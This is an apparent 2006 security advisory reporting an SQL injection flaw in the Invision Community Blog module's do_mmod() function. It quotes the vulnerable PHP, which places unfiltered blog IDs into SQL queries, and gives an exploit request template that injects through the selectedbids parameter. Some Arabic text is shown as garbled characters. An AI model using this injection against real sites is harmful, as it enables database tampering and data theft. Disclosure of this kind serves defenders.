Lucene search
SecurityvulnsSECURITYVULNS:DOC:12556HistoryMay 06, 2006 - 12:00 a.m.
Invision Community Blog .. Bugs
2006-05-0600:00:00
vulners.com
14
[LEFT]
Invision Community Blog … Bugs
SQL Injection :-
Filename :- mod.php
Function name :- do_mmod()
The $ids Unfilter Input By Intval As Array :) So We Can Do SQL Injection –>
- Arabic *
[/LEFT]
[RIGHT]
ЗбгКЫнС $ids ЫнС гЭбКС Ъд ШСнЮ ЗбПЗбе intval жеж ИФЯб гХЭжЭе … беРЗ ЗбУИИ ггЯд Ъгб чНЮде
[/RIGHT]
[LEFT]
[php]
$ids = array();
$ids = explode( ',', $this->ipsclass->input['selectedbids'] );
…
$ids = implode( ',', $ids );
…
$this->ipsclass->DB->do_update ( 'blog_blogs', array ( 'blog_disabled' => 1 ), "blog_id IN ({$ids})" );
$this->ipsclass->DB->simple_construct ( array ( 'select' => 'member_id', 'from' => 'blog_blogs', 'where' =>
"blog_id IN ({$ids})" ) );
$this->ipsclass->DB->simple_exec();
…
$this->ipsclass->DB->do_update ( 'blog_blogs', array ( 'blog_disabled' => 0 ), "blog_id IN ({$ids})");
$this->ipsclass->DB->simple_construct ( array ( 'select' => 'member_id', 'from' => 'blog_blogs', 'where' =>
"blog_id IN ({$ids})" ) );
…
[/php]
[/LEFT]
[RIGHT]
ЗбЗУКЫбЗб
[/RIGHT]
[LEFT]
Exploit :-
GET ^
/IBP/index.php?
POST ^
automodule=blog&req=blogmmod&auth_key=[auth_key]&selectedbids=-1,-1)[SQL]&blogact=unpin
[/LEFT]